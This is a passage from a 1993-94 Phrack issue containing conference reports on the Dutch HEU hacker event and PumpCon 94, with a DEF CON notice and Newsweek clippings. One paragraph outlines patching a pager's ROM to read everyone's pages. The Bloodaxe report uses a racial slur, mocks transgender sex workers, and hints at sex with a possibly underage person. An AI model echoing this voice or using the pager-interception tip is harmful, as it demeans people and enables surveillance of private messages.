  6237. FOR MORE INFORMATION:
  6238.  
  6239. For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in
  6240. /pub/defcon.  There are digitized pictures, digitized speeches and text files
  6241. with the latest up to date info available.
  6242.  
  6243. For email users, you can email dtangent@defcon.org for more information.
  6244.  
  6245. For Snail Mail send to DEF CON, 2702 E. Madison Street, Seattle, WA, 99207
  6246.  
  6247. For Voice Mail and maybe a human, 0-700-TANGENT on an AT&T phone.
  6248.  
  6249. A DEF CON Mailing list is maintained, and the latest announcements are mailed
  6250. automatically to you.  If you wish to be added to the list just send
  6251. email to dtangent@defcon.org.  We also maintain a chat mailing list where
  6252. people can talk to one another and plan rides, talk, whatever.  If you request
  6253. to be on this list your email address will be shown to everyone, just so you
  6254. are aware.
  6255.  
  6256.  
  6257. STUFF TO SPEND YOUR MONEY ON:
  6258.  
  6259. > Tapes of last years speakers (four 90 minute tapes) are available for $20
  6260.  
  6261. > DEF CON I tee-shirts (white, large only) with large color logo on the front,
  6262.   and on the back the Fourth Amendment, past and present.  This is shirt v 1.1
  6263.   with no type-o's.  These are $20, and sweatshirts are $25.
  6264.  
  6265. > Pre-Register for next year in advance for $15 and save half.
  6266.  
  6267. > Make all checks/money orders/etc. out to DEF CON, and mail to the address
  6268.   above.
  6269.  
  6270. If you have any confidential info to send, use this PGP key to encrypt:
  6271.  
  6272. -----BEGIN PGP PUBLIC KEY BLOCK-----
  6273. Version: 2.3
  6274.  
  6275. mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
  6276. dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
  6277. uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
  6278. hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
  6279. IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
  6280. =ko7s
  6281. -----END PGP PUBLIC KEY BLOCK-----                              ==Phrack Magazine==
  6282.  
  6283.                  Volume Four, Issue Forty-Four, File 8 of 27
  6284.  
  6285.                                 Conference News
  6286.  
  6287.                                    Part III
  6288.  
  6289. ****************************************************************************
  6290.  
  6291. A Hacker At The End Of The Universe
  6292.  
  6293. by Erik Bloodaxe
  6294.  
  6295. Eight hours on a plane isn't that bad.  It isn't that fucking great
  6296. either, but it isn't the end of the world.  This is especially true
  6297. under certain circumstances like if you were being inducted into the
  6298. mile-high club by means of an obscure tantric ceremony, or you've just
  6299. successfully hijacked a 747, or you are nestled in your seat on your way
  6300. to Amsterdam.
  6301.  
  6302. Unfortunately, I haven't hijacked much lately, and as far as the mile
  6303. high club goes I'm pretty sure you need a partner to join; but as I was on
  6304. my way to Hacktic's Hacking at the End of the Universe conference, I was
  6305. stoked.
  6306.  
  6307. When I finally arrived in Amsterdam and breezed through customs, I was
  6308. greeted with the pleasant sight of a LOD Internet World Tour T-Shirt
  6309. being held up above the throngs congregating at the customs exit.  Its
  6310. owner, Carl, was probably the only American that I knew that was going
  6311. to be in this country so we had arranged previously to meet.  The shirt
  6312. was my beacon.
  6313.  
  6314. EB's Handy Travelling Tip #1:  Never have more bags than you have hands.
  6315.  
  6316. I was to find out that we were in for a good deal of walking.  Me being
  6317. such a fucking plan ahead kind of guy, had packed enough clothes for 8 days
  6318. and brought a camcorder as well as my laptop and assorted other crap.  This
  6319. was all find and dandy except for the fact that I had three bags and only two
  6320. hands.  I hoisted one bag up on a shoulder strap (which would begin its
  6321. week-long gradual slicing into my collarbone) and drug the other two bags
  6322. behind me.
  6323.  
  6324. Carl had rented a room in Naarden at a Best Western or something.  The con
  6325. was in Lelystad somewhere.  Neither of us had any idea of exactly where
  6326. these two places were in relation to one another.  We would soon find
  6327. that they were no where close.
  6328.  
  6329. EB's Handy Travelling Trip #2:  Buy a Eurail Pass or the national equivalent
  6330.                                 thereof.
  6331.  
  6332. Luckily, Carl had the foresight to suggest that we should buy a train
  6333. pass for the week.  It was only like 50 bucks and got us free rides
  6334. on the trains, trams, buses, and train-taxis everywhere in the Netherlands.
  6335. It MORE than paid for itself.
  6336.  
  6337. We hopped a train and rode to the Amere stop, then took a taxi to
  6338. the hotel, dropped off our crap then rode a bus back to the station
  6339. and went into Amsterdam.
  6340.  
  6341. Amsterdam is a really neat place.  I think everyone should go there
  6342. at least once.  Carl and I wandered around for hours and hours
  6343. just checking things out.  During our travels I discovered some really
  6344. neat places.
  6345.  
  6346. EB's Handy Travelling Tip #3:  Pornography Is Good.
  6347.                                Foreign Pornography is GREAT!
  6348.  
  6349. I have to respect a country that has smut proudly displayed everywhere.
  6350. In every magazine rack, in every train station, convenience store and
  6351. in large (clean, well-lit, heh) stores everywhere, smut.  Not your average
  6352. run of the mill nastiness either.  We're talking monumental titles
  6353. like "Teenage Sperm," "Seventeen," "Teeners From Holland," "Sex Bizarre,"
  6354. and "Color Climax."
  6355.  
  6356. I went in every smut shop we saw.  I think Carl wanted to die of embarrassment.
  6357. I was like a kid in a candy store.  It was really pathetic.  You would not
  6358. believe the shit they sell over there.  Well, maybe you would.  I pray
  6359. that I can buy a vcr that transfers PAL to NTSC someday.
  6360.  
  6361. One of the most hilarious items I saw was a HUGE dildo in the shape of an
  6362. arm with a fist.  And I mean life size.  Like Arnold Schwartzenegger's
  6363. arm life size.  I wonder if that's a big seller?
  6364.  
  6365. We finally got totally zonked out and headed back to the hotel to
  6366. relieve our jetlag tomorrow was the con!
  6367.  
  6368. EB's Handy Travelling Tip #4:  Always take the Train Taxi
  6369.  
  6370. In Holland, once you get off the train, for an extra 10 guilders, you can
  6371. get a pass for a special taxi to take you anywhere you need to go.  Carl
  6372. and I didn't find this out until a few 20 dollar cab rides to the campground.
  6373.  
  6374. HEU was held out in the Dutch countryside.  A more appropriate title might
  6375. have been "Hacking in the Middle of Fucking Nowhere."  The taxi driver
  6376. had been shuttling people out there all day.  As we approached the campground
  6377. signs for the conference began to show up.  Signs of geekdom on the horizon.
  6378.  
  6379. We got out at the gate, and walked over to the tent that said registration.
  6380. In the tent were a couple of guys who took your picture and printed out
  6381. a badge with your picture digitized on it.
  6382.  
  6383. The area was layed out very well.  There was a very big barn like structure
  6384. where several dozen computers were all networked together.  I sat down
  6385. at one and saw that there was even a slip trying to work.  With that many
  6386. people trying to be on the net, it was almost 20 baud!  Wow, technology
  6387. at its finest.  :)   I also noticed that at least 2 people were running
  6388. ethernet sniffers, so I decided that it would not be prudent to
  6389. mess with the net there, even if the bandwidth dramatically increased.
  6390.  
  6391. Also in the barn were a tv/vcr area, several couches, a merchandise
  6392. area and a snack bar.  The snack bar sold rolls for a buck, and had free
  6393. sandwich makings (like pb & j, cheese & meat, etc..) chips, jolt, and
  6394. beer.  This was very important to me since I was wondering if I'd
  6395. get to eat.
  6396.  
  6397. There was to be some kind of food provided (a meal) for five bucks, but
  6398. it was so foul that it could not be believed.  And to top it all off
  6399. it was vegetarian.  Not just regular vegetarian, but totally off beat
  6400. stuff that smelled like old socks.  Nasty gruel unfit for even
  6401. prisoners.
  6402.  
  6403. Behind the barn was the camping area.  There was a HUGE tent
  6404. that was the main meeting area, and several mid-size tents.
  6405. Additionally there was a large lookout tower, and a shitload of
  6406. tents set up for sleeping.  Running all over the campground were cables
  6407. for the conference's LAN.
  6408.  
  6409. It was impressive so say the least.
  6410.  
  6411. One of the first people I ran into at the con was KCrow.  He helped me
  6412. try to find a safe place to stow some of my crap.  (Again, me and my
  6413. fucking bags.  I'm such an asshole.)  We tried to place them in
  6414. the network control room, but Bill SF told me to "get the hell out
  6415. of there," so I did.  And this of course, has left me with a wonderful
  6416. opinion about Bill SF.  (Bill, I love ya!)  Several people tried to
  6417. make excuses in his behalf such as "he hadn't slept in days," or
  6418. "Bill isn't ever so rude," and "He's got a lot on his mind."
  6419. Yeah, right.
  6420.  
  6421. (And I didn't even say ANYTHING about how shitty it would be to try to
  6422. make millions counterfeiting something, then let one of your friends take
  6423. the fall for you, while you left the country.  Nope.  I would never be so
  6424. rude.  There is a difference between a true hacker and an opportunistic
  6425. technologically literate criminal.  But I didn't say that.)
  6426.  
  6427. I finally just stuck my stuff behind the merchandising area and prayed
  6428. that there was still honor among thieves.
  6429.  
  6430. I then ran into Damiano.  He told me who was around.  Several CCC people
  6431. had arrived in a convoy of odd urban assault vehicles.  The Germans
  6432. (other than Damiano) kind of made me uneasy.  They seemed to hang
  6433. together and didn't talk to many non-germans.  I suppose maybe some
  6434. of them didn't speak English, or maybe I was just thinking odd
  6435. Nazi fantasies.  I dunno.  Of all the people that were supposedly
  6436. there, I kept missing Pengo.  It was like some kind of weird trick.
  6437. "Did you see him?  He was just here."  I never saw him.
  6438.  
  6439. That afternoon I only made it to one "workshop."  I was to find out
  6440. later that all of the really technical workshops had a common thread.
  6441. "Here's this cool technology, now go buy it from Hack-Tic for several
  6442. hundred dollars."
  6443.  
  6444. The first example I had of this was in the "It came out of the sky"
  6445. workshop where Bill SF talked about a device they had made that
  6446. received pager information.  They presented a few scenarios in which
  6447. police or other nasties might watch pagers, or always page certain numbers
  6448. right before raids, etc...
  6449.  
  6450. The concept was neat, but certainly nothing new.  For a few bucks more
  6451. than they were asking for the Hack-Tic model, you can buy a multimode
  6452. decoder from Universal Radio (model M-400).  It not only does POCSAG but
  6453. also GOLAY (for pagers), ACARS, ASCII, Baudot, SITOR A & B, FEC-A, SWED-ARQ,
  6454. FAX, CTSS, DCS & DTMF!  Now that's a decoder.
  6455.  
  6456. Additionally, a company called SWS security makes a similar device for
  6457. law enforcement people at about $4,000 that does nothing but decode
  6458. pager information.
  6459.  
  6460. If it came right down to it, all you would have to do is open up your beeper,
  6461. dump the rom, and tell it to display info for ALL cap-codes rather than
  6462. just yours.  Your cap-code is written on the back of your beeper, and is
  6463. stored in non-volatile memory somewhere.  Look for the call to it, and have
  6464. it always branch to the display routine rather than do a comparison.
  6465.  
  6466. I asked Bill about re-crystaling the device, since it there's would only be
  6467. able to pick up one pager channel as is, and about whether or not anyone had
  6468. played with any of the 8-bit paging types such as is used in America on
  6469. services such as EMBARC.  Bill looked at me as if I was on crack, and
  6470. asked, "Are there any other questions?"  Sigh.
  6471.  
  6472. After that workshop, I took off with Andy of the Chaos Computer Club
  6473. back to the German enclave.  These guys were nuts.  They had several
  6474. winnebagoes totally decked out with all kinds of archaic electronic
  6475. gear.  They had all kinds of odd radio equipment; weird shit
  6476. with Russian lettering was strewn about.  The guys hanging about
  6477. were jamming out really loud hard techno.  I leeched a few programs
  6478. from Andy and then took off back to the main area.
  6479.  
  6480. Sometime later, a guy who said he knew me from way back named
  6481. Mr. Miracle came up to say hello.  I had no idea, but since I rarely
  6482. remember my own name, I took him for his word.  Mr. Miracle was at the
  6483. con with his friends Wim and a Tasmanian Amiga Dude named XTC.
  6484. We hung out the rest of the afternoon bullshitting and talking about
  6485. all kinds of stupid things.
  6486.  
  6487. As it grew dark, everyone moved into the Barn.  Me, Carl, Mr. Miracle, XTC,
  6488. Wim, and another Dutch Hacker named The Dude sat down to drink.  We were
  6489. joined for a bit by another Dutchman named The Key.  He was totally
  6490. into lock picking, and had a plethora of picks.  (Car masters, traditional
  6491. rakes, tube lock picks, and a weird looking pick for all new model fords.)
  6492. The Key was a large, sinister looking guy who never took off his extremely
  6493. dark sunglasses.  I don't know if it was only for effect, but it certainly
  6494. worked.
  6495.  
  6496. I decided it was high time to introduce the Dutch to that quaint American
  6497. custom, Quarters.  We must have gone through some 200 glasses of beer, and
  6498. were extremely loud, drunk and obnoxious.  One woman (I think it was a woman)
  6499. wandered over to us and said, shouldn't you all be on the computers or
  6500. something.  We cursed until she left.
  6501.  
  6502. Mr. Miracle invited Carl and I to stay at his place for the rest of the con
  6503. so we wouldn't have to go all the way back to our hotel.  This was a godsend.
  6504. We all piled into The Dude's car for a ride to the apartment that made
  6505. Busch Garden's "Kumba" look like a merry-go-round.  We were quite happy
  6506. to make it home alive.
  6507.  
  6508. Xtc was also staying at Mr. Miracle's.  We all spilled onto the floor
  6509. upstairs in his townhouse.  While we were all getting ready to pass out,
  6510. Xtc yakked all over a bathroom.  Needless to say Mr. Miracle and
  6511. his girlfriend were pissed.  We all thought there was going to be a death,
  6512. but somehow Xtc lucked out.
  6513.  
  6514. The next morning we all took off over to check out of the Hotel
  6515. Carl and I had rented.  Carl had put some money in their safe.
  6516. Of course, the safe broke, and it took them nearly an hour to destroy
  6517. the safe completely so Carl could retrieve his 300 in traveller's checks.
  6518. Mr. Miracle remarked, "Where's The Key when you need him."
  6519.  
  6520. When we finally ended up back at the con, there was a large meeting
  6521. going on about Phone Phreaking.  Emmanuel Goldstein, Bill SF, Rop,
  6522. KCrow (KCROW??) and others were babbling on the panel.  Phiber Optik was
  6523. on a speaker phone adding commentary.  I toyed with the idea of getting
  6524. on the phone and wishing him well and telling him how cool it was in Holland,
  6525. but I decided that would be too mean.
  6526.  
  6527. I sat outside the panel listening to everyone complain about the evils
  6528. of the phone company.  Many got up and argued that what they were doing
  6529. was morally right, because the phone company charges too much.  They also
  6530. argued that since the lines were already there they should be able to use
  6531. them for free.  I got disgusted and began yelling about how there were
  6532. chairs in the tent not being used and I wanted my hundred guilders back.
  6533.  
  6534. Several people gathered around and I kept ranting.  Mr. Miracle joined
  6535. in on the spree and began challenging just how much Hack-Tic was
  6536. making off of the conference.  He estimated at minimum 500 people
  6537. at 100 guilders a piece.  50000 guilders.  That's a lot of money.
  6538. The crowd gathering around us began questioning the whole situation too.
  6539. It got ugly, but none of us had the balls to say anything about it.
  6540.  
  6541. Later that day I sat down to hear Fidelio and RGB give a talk about
  6542. Unix Security.  I had asked them beforehand if they were going to talk
  6543. about anything that I wouldn't know.  (God, afterwards, I realized
  6544. just how snotty that sounded.  I'm a prick.)  It went pretty good
  6545. since most of the people in the crowd weren't gurus and this gave
  6546. them a good overview.
  6547.  
  6548. Afterwards, Bill SF was holding a workshop about Wireless LANs.  I was
  6549. thinking this would be a tutorial about wireless lan theory and
  6550. how their security was handled, etc.  WRONG!  Hack-Tic is supposedly
  6551. building a frequency hopping wireless ethernet adaptor.  (Soon to
  6552. be available at a store near you.)
  6553.  
  6554. I asked Bill why they went with frequency hopping rather than
  6555. direct sequence.  There are basically two schools of thought about
  6556. spread spectrum, and both have their plusses.  Bill said
  6557. their device would be hard to jam.  I replied that if I pumped
  6558. as little as 1 watt over a particular range, maybe like a 15 Mhz
  6559. range, their device would be just as hosed as anyone else's.
  6560.  
  6561. As an afterthought, I hope they build it in the 2.4GHz range, because
  6562. that's the only frequency block that is legal everywhere for
  6563. this type of application.
  6564.  
  6565. Sometime later Bill SF was to give a phone phreaking tutorial.  He trudged
  6566. off in the woods to hold a secret workshop.  Unfortunately, I wasn't
  6567. among the privileged audience members, but I hear rumors that the
  6568. Demon Dialer is available for sale.  Sigh.
  6569.  
  6570. I have no idea what I did for the next few hours.  I think I was
  6571. abducted by aliens.  The final panel of the evening was a
  6572. social engineering panel being led by The Dude.  Let's just say that
  6573. a European idea of what to use your bullshitting skills for is
  6574. a little bit different than that of your American hacker.
  6575.  
  6576. The Dude offered advice like "Say you are with the news or a tv star and
  6577. maybe they will give you a guest account," or "Once I called up and said I
  6578. was doing a story, and they told me information about their computers."
  6579.  
  6580. WOW!  Pretty radical stuff.  I remember a certain boy holding up a 7-11 by
  6581. phone.  I remember someone turning my phone into a payphone by bullshitting
  6582. an idiot at the switch.  I remember people getting root passwords from
  6583. system admins by social engineering.  Where were Chasin, RNOC & Supernigger
  6584. when you needed them?  These are the true greats.  I don't know what these
  6585. people at HEU were all excited about, but they all loved it.  Ahhh,
  6586. ignorance IS bliss.
  6587.  
  6588. After dark for some reason we were all drawn once again to the quarters
  6589. table.  It was brutal.  They ran out of glasses.  We made pyramids with
  6590. the empties.  We played chandeliers.  We belched, we hollered, we were
  6591. manly men doing manly things, and we mocked those playing computer
  6592. games just a few yards away.  We laughed at them with manly laughs.
  6593. And I don't think anyone threw up that night.
  6594.  
  6595. We got a ride home that night from The Key.  He never took off his glasses.
  6596. There are no lights along the highways in Holland.  Luckily I was
  6597. drunk, or I would have been scared shitless.
  6598.  
  6599. The final day of the conference we arrived in time to see the "hacking and
  6600. the law" panel.  Emmanuel Goldstein, RGB, Rop, Ray Kaplan, Wietse Venema,
  6601. Andy from the CCC, a Dutch CERT guy and a few others were on the panel.
  6602. It started very well but went sour quickly.  It was supposedly being moderated
  6603. by this asshole of a journalist who apparently didn't understand what it
  6604. meant to moderate.  He would answer EVERY question addressed to the
  6605. panel, whether or not he even knew what the question was about.
  6606.  
  6607. This shithead gave journalists a bad name.  Finally this guy got so
  6608. annoying that I finally got up and left.
  6609.  
  6610. We decided not to hang out for the party at the end of time.  We figured
  6611. that the party would be much more fun in Amsterdam, so we cut out.  It
  6612. was time to get into the city and cause problems.
  6613.  
  6614. EB's Handy Travelling Tip #5:  Don't buy drugs in other countries.
  6615.  
  6616. Drugs are illegal in Holland, despite what everyone says.  Despite this
  6617. fact, they are plentiful and every swinging dick on the street has
  6618. a few pills or joints to sell you.  Now the way I looked at it,
  6619. why in the world would you go a zillion miles away to see another
  6620. country and spend your time wasted?
  6621.  
  6622. It reminded me of walking in the Height after dark, or going down
  6623. the Drag in Austin a few years back.  Every three steps we took in
  6624. Amsterdam, some joker would run up and say, "You want good smoke?
  6625. Ecstasy?  Cocaine?  You want good coke?  How about some good hashish?"
  6626. I should have asked for DMT, but I just blew everyone off.
  6627.  
  6628. On top of all this, there are like 5 or so bars in Amsterdam that
  6629. actually sell hash in the bar.  They are very easy to spot.  They are
  6630. the ones with the pot plants in the window and the tell tale dope smell
  6631. permeating every pore of your body when you walk past.  The big ones
  6632. are the Bulldog and High Times.  Save your money for better things,
  6633. like t-shirts or smut.
  6634.  
  6635. At the con, several people were selling "Space Cakes" which were essentially
  6636. hash brownies.  If you've never eaten dope, you might not like it.  It
  6637. comes on slower, lasts longer, and generally puts you to sleep.  This was
  6638. not what I'd want at a Hacker Con.  We needed stimulants, damnit!  I
  6639. drank lots of jolt instead.
  6640.  
  6641. EB's Handy Travelling Tip #6:  Go to the Red Light District in Amsterdam.
  6642.  
  6643. Even if you are too cheap (or too moral) to shell out the 25 bucks, you
  6644. should go check out the Red Light District.  Be forewarned, all those
  6645. people who tell you that the women are all "so fine" are either fucked up
  6646. or have bad taste.
  6647.  
  6648. In the Red Light area the women hang out behind windows in their underwear
  6649. and try to coerce you into sleeping with them by taunting you, flashing you,
  6650. or making other sexual innuendoes.
  6651.  
  6652. Unfortunately, the vast majority of these "women" look like out-takes from
  6653. "The Crying Game."  We are talking adam's apples and big hands here.  Large
  6654. boned Asian creatures that scared the shit out of me.  These things were
  6655. NASTY.
  6656.  
  6657. Mr. Miracle, Wim and I must have walked around for an hour looking for
  6658. decent women.  Finally we came across two.  TWO.  Out of hundreds, there
  6659. were two.  One was a tall blonde in her twenties.  One was a short, tan
  6660. brunette who looked, uh, young.
  6661.  
  6662. 17:10.  I'll spare you the details.  Let your imaginations run free.
  6663.  
  6664. EB's Handy Travelling Tip #7:  There's no place like home.
  6665.  
  6666. I was very happy to hop on that plane back to the USA.  As much as I hate
  6667. to admit it, I really wouldn't know what to do with myself if I didn't
  6668. live in America.
  6669.  
  6670. Maybe an England or Australia trip would have been totally different.  It
  6671. really sucked not being able to speak the language.  I also got real
  6672. tired of trying to find food I could eat.  [I gave up red meat almost a
  6673. year ago, and Europeans LOVE THEIR MEAT.  Trying to find chicken was
  6674. a nightmare.  The Dutch word for chicken is KIP.  Remember that.]
  6675.  
  6676. The TV sucked, there weren't really any good places for live music,
  6677. the women weren't interested in a scummed-out, long-haired American
  6678. tourist and I missed my cat.  I met some really cool people and
  6679. had a blast for the week I was there, but I was real happy to land
  6680. in the USA.
  6681.  
  6682. *Epilogue*
  6683.  
  6684. EB's Handy Travelling Tip #8:  If you think customs is going to search you
  6685.                                they won't.
  6686.  
  6687. Me, being stupid, left all my good smut in the Netherlands because I was
  6688. afraid I'd get arrested for it.  I envisioned the conversation.  "What are
  6689. you doing with all these nasty things, boy?  You are one sick fucker!
  6690. Lookie here Bob, this here hippy has pictures of gals a pissin' on one
  6691. 'nuther."  So what happens?  They smile and wave me through.  Fuck.
  6692.  
  6693. *******************************************************************************
  6694.  
  6695. Hacking at the End of the Universe
  6696. by Nimrod Kerrett, zzzen@math.tau.ac.il
  6697.  
  6698. "A Techno-Anarchist Convention" -- August 3-6, Larserbos, HOLLAND.
  6699. The announcement in Computer Underground Digest committed its viral act,
  6700. erasing all the neatly ordered schedule entries for the first week of
  6701. August from my old, grey memory cells, to be replaced by a neon light
  6702. flashing "You deserve a vacation in Holland." Away we went...
  6703.  
  6704. Most of us European/Third-World dwellers don't get to see much of the
  6705. physical manifestations of Gibson's self-executing prophecies. OK. The
  6706. Matrix is there, but to witness street-culture one must live in San
  6707. Francisco or somesuch. HEU -- Hacking at the End of the Universe -- looked
  6708. like the only chance to surface on the physical side of a phone plug and
  6709. experience cyber-culture in form of faces, fashion and body-lang. How naive
  6710. I was to presume this. Compared to most of the kids there, I looked
  6711. dangerous (a timid, Swiss-bank sysadmin)... But don't get me wrong, I DID
  6712. have fun -- failing to do so in Holland requires quite a unique
  6713. body-chemistry -- but I had a nagging feeling that European hackers still
  6714. live in the Seventies.
  6715.  
  6716. First, A Few Positive Notes
  6717.  
  6718. The most important lecture addressed electronic money. I won't go into
  6719. sci.crypt-style details, but this was the most exciting thing I've ever
  6720. heard since public-keys were first explained to me. The president of a
  6721. Dutch firm called DigiCash described a crypto scheme where a bank can issue
  6722. electronic credit-certificates which can't be forged, and yet are immune to
  6723. traffic analysis. Their digital cash is just like physpace cash: it has no
  6724. smell. You get a "virtual $100 bill" from the bank that you can't forge or
  6725. spend more than once, and which the bank can't trace -- e.g. to the
  6726. specific person who requested it.
  6727.  
  6728. Ever since society devolved from cash to credit cards, people have become
  6729. used to the idea that our shopping-histories are readily subject to
  6730. electronic surveillance. At HEU I learned this was all hype: we CAN evolve
  6731. economic systems to enjoy advantages of digital communication without
  6732. sacrificing our privacy.
  6733.  
  6734. Another interesting issue was a lecture by an ex-CIA executive who went
  6735. private [ed. note: positively identified as a net.personality on the WELL]
  6736. and now tries to preach for open-source approaches: instead of creating
  6737. your own locks and picking the ones of your neighbor, the idea is to use
  6738. information-gathering/analysis techniques -- one of those things in which
  6739. "intelligence" bodies specialize -- to derive content from the info-swamp
  6740. we seem to be sucked into... and then sell it. This guy made arguments
  6741. similar to what Barlow said before the hush-hush community a few months
  6742. ago, but seems to refocus everything on enterprise. Mighty exciting. BTW,
  6743. I've noticed how the concept of profit makes bleeding-heart European
  6744. anarchist types wince...
  6745.  
  6746. The network built onsite also impressed me. In a campground setting,
  6747. subject to occasional rainstorms, they erected three LANS connecting nearly
  6748. 100 computers of all sizes and shapes, plus terminal servers for the
  6749. Etherless. Computers were placed in our private tents, and the field
  6750. bloomed with PC/XTs-turned-repeaters covered in wet plastic sheets. This
  6751. monstrosity connected to the Internet over three shaky SLIP dial-up lines
  6752. and it actually WORKED -- it cost some sleepless 36 hours, but still, WOW.
  6753.  
  6754. Switch To Poison Ink
  6755.  
  6756. Hacker (n) -- (1) One who derives pleasure from making systems do things
  6757. they're not supposed to do. (2) A nerd who does word-processing in
  6758. hexadecimal, is allergic to color or windows and hates being called a
  6759. "user" in ANY context.
  6760.  
  6761. Most of the hackers I met at HEU fell under the second definition. I was
  6762. even scolded for using "Wintendo" and wasting the precious power of my 486
  6763. notebook. Let's start with the local network -- having all the tents
  6764. connected was a wonderful idea, and symbolized constructive techno-anarchy.
  6765. Unfortunately it lacked cultural content. To begin with, you had to login
  6766. as a guest -- if you'd figured out the IP number of a server working at the
  6767. moment. You had no identity handle, so there was no use in talking about
  6768. site-specific newsgroup for follow-ups on topics. Even local email was
  6769. impossible; to whom would you email? Since everyone got a badge on
  6770. entrance, why didn't we also receive user-ids, perhaps written on the
  6771. badges? Even administrative announcements (e.g. schedule changes) were only
  6772. available on a PHYSICAL bulletin-board in the bar... ever tried to scan
  6773. manually over 200 paper scraps?
  6774.  
  6775. Another side effect was that to justify dragging your portable all the way
  6776. to Holland, you just HAD to hog the SLIP lines and telnet outside, which
  6777. made life hard for all of us, but much harder for the networking crew. In
  6778. my humble opinion, excessive telneting is like saying "Nothing to do here,
  6779. let's try somewhere else." I LIVE somewhere else; I took a plane in order
  6780. to check out THIS place. Telneting was also a problem since the
  6781. IP-resolving system didn't work and we had to apply hacking techniques to
  6782. find the IP numbers back home.
  6783.  
  6784. The most frustrating thing was the social/political discussions. In a
  6785. discussion titled "Networking For The Masses" someone dared suggest
  6786. user-friendliness as a key to resolving computer illiteracy. "No shit,
  6787. Sherlock" -- I hear you mumble. Well, here's how another panel-member
  6788. replied: "A revolution is not a user-friendly thing. Activists shouldn't
  6789. count on the computer community to make stuff easier for them". Watch out,
  6790. masses... prepare for computer military-training once the Revolution is
  6791. over.
  6792.  
  6793. Let's take another trendy political subject -- cryptography. One would
  6794. assume that any techno-anarchist convention in '93 would feature a nice
  6795. level of heated, political, crypto-discussion. Well, nada. The only
  6796. crypto-related subject was the "electronic cash" mentioned above. Although
  6797. it's quite exciting for the crypto-enlightened, 90% of the HEU audience
  6798. lost contact after the first three cube-roots, returning to their tents to
  6799. telnet elsewhere. I was left in a small group of highly-technical
  6800. Cypherpunks who didn't give a fork whether New Delhi housewives would ever
  6801. understand the switches of PGP; they seem to ENJOY their wizardly "elite"
  6802. status.
  6803.  
  6804. Even in discussions about hacker-paranoia, the audience disliked the idea
  6805. of demystifiyng the almighty-hacker image to make your average,
  6806. trigger-happy policeman relax a bit. Does Europe need an equivalent of
  6807. USA's "Operation Sun-Devil" to knock sense into its collective skulls? FTP
  6808. to ftp.eff.org:/pub/cud/papers/crime.puzzle  to learn from the bitter
  6809. experience of others (I don't know the IP number!).
  6810.  
  6811. Epi-Travel-Log
  6812.  
  6813. Before the convention, I naively believed that at least the HACKERS could
  6814. Read the Writing on the Wall... Since I'm sober now, I'll spell it out for
  6815. you:
  6816.  
  6817. When the world finally adopts strong public-key cryptography (I hope it
  6818. does, since I've seen too many wars and acts of human-rights
  6819. infringement in my life), two things will become virtually impossible: 1)
  6820. seeing what you're not supposed to see; and 2) changing what you're not
  6821. supposed to change, unless you want to cause brute-force damage.
  6822.  
  6823. These two anachronistic activities represent the basis for most
  6824. hacker-culture I encountered at HEU -- so my advice is: switch to the first
  6825. dictionary-definition of "Hacker". Try being less techno and more
  6826. anarchist. There's a revolution going on... in case you've missed out on
  6827. some Usenet recently.
  6828.  
  6829. ----
  6830. Reprinted from Fringe Ware Review #2, ISSN 1069-5656.
  6831. Published by FringeWare Inc., fringeware@illuminati.io.com
  6832. Copyright (C)1993, Nimrod Kerrett. All rights reserved.
  6833.  
  6834. *******************************************************************************
  6835.  
  6836. Hackers Play The Field                                            July 26, 1993
  6837. ~~~~~~~~~~~~~~~~~~~~~~
  6838. (Newsweek) (Page 58)
  6839.  
  6840. [A Newsweek reporter packs for, and dreams about, HEU in the Netherlands.
  6841.  As you can tell, it was written before the actual con]
  6842.  
  6843. There's no guarantee of a large turn-out, but if thousands show up, it may
  6844. help demonstrate how far hacking has moved out of the bedrooms of smelly
  6845. adolescents.  If so, there's likely to be less geeking and more dancing in
  6846. the Dutch summer night.  Programmers may one day be able to lean back from
  6847. their terminals, pat their pocket protectors and say, "I was there."
  6848.  
  6849. *******************************************************************************
  6850.  
  6851. A Woodstock For Hackers and Phreaks                             August 16, 1993
  6852. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6853. by Barbara Kantrowitz and Joshua Ramo
  6854.  
  6855. It was billed as "Woodstock for the Nintendo Generation"  The techno-freaks
  6856. who gathered at the Hackers at the End of the Universe in the Netherlands
  6857. last week had at lease one thing in common with their '60s counterparts:
  6858. they believed rules were made to be broken.
  6859.  
  6860. Some were there only electronically, communicating through networks around the
  6861. world.  The rest--the vast majority of them males in their late teens and
  6862. early 20s--gathered in hundreds of multicolored tents clustered around
  6863. power outlets and portable toilets in an area the size of six football fields.
  6864. Many had computer terminals in their tents, with the monitors nestled
  6865. between sleeping bags and guitars.
  6866.  
  6867. No one was surprised by the white van bristling with antennas that trolled
  6868. up and down the road leading to the campground.  Everyone seemed to agree
  6869. that it belonged to the Dutch Secret Service; everyone also assumed the
  6870. meeting was being monitored by the CIA and Britain's MI6.  But no one
  6871. knew for sure; paranoia is popular among hackers.
  6872.  
  6873. *******************************************************************************
  6874.  
  6875.                              Pump Con 94
  6876.  
  6877.                        "The Legacy Continues"
  6878.  
  6879.                           by Erik Bloodaxe
  6880.  
  6881.  
  6882. Travelling sucks most of the time.  People like to glamorize it as if
  6883. it's some kind of status unobtainable to the "Average Joe" but
  6884. nine times out of ten its just a pain in the ass.
  6885.  
  6886. My trip to Philadelphia for the second PumpCon fell well within the
  6887. aforementioned nine of ten.  I was sick as a dog, coughing up
  6888. large blood-soaked clots of phlegm at a steady pace.  This was
  6889. either due to some undetected immune system failure or due to my
  6890. previous weekend's fiasco which dealt with chemical overindulgence,
  6891. alcohol abuse and some kind of strange creatures that tried to pass
  6892. as female...but that's another story.
  6893.  
  6894. (We will assume that my ill-health stemmed from the latter.)
  6895.  
  6896. I showed up at the Comfort Inn to find a lobby full of what had to be
  6897. conferees.  (They had been saying to many people they were "Campus
  6898. Crusaders for Christ.")
  6899.  
  6900. After checking in I stumbled over to the group to see who was who.
  6901. I introduced myself and asked if Dr. Who or Mark Tabas had showed up.
  6902. They had not.  (And as it turns out, they would never show up.  Dr. Who
  6903. I can forgive since he had no way in from Boston, but Tabas...obviously
